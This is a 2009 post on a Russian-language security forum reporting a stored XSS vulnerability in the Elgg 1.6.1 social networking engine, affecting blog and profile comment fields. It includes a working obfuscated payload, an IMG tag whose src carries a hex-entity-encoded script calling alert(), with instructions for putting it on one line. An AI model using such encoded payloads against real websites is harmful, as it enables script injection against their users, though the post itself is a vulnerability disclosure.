HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Elgg 1.6.1
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Elgg 1.6.1
  #1  
Старый 07.11.2009, 08:07
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию Elgg 1.6.1
Elgg 1.6.1
A social networking engine

Активная XSS
В модуле Блог.
В поле комментарии.
Цитата:
<IMG src=&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;
&#x3E;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x29 ;
&#x3B;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;&#x70;&# x74;&#x3E;>
</IMG>
В модуле Профиль.
В комментариях к любому профилю, тоже самое что упомянулось выше.
Данная уязвимость находиться везде, где можно ввести свои текстовые данные.
(HTML (without semicolons))
ps Уберите пробелы, значение src должно быть в одну строку.
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ